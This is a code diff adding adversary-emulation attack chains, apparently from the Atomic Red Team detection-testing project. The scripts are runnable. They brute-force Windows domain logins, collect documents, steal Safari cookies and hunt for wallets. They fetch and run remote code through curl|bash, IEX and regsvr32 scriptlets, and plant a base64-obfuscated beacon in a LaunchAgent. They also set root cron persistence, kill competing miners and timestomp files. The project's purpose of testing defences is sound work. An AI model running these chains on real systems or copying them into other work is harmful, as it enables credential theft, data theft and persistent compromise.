# rm -rf /tmp/.exfil/
ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+49
View File
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+16
View File
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+14
View File
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
+49
View File
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1002 - Data Compressed
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048 - Exfiltration Over Alternative Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1159 - Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x ./xmrig2
./xmrig2
ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
+25
View File
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1043 - Commonly Used Port
#
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
ARTifacts/Chain_Reactions/mirai-reaction-stage-01.sh
Executable
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
ARTifacts/Chain_Reactions/rocke-and-roll-stage-01.sh
+10
View File
@@ -0,0 +1,10 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncommend the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh
+81
View File
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh
+90
View File
@@ -0,0 +1,90 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
ARTifacts/Labs/Webinar11062017-Labs.bat
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
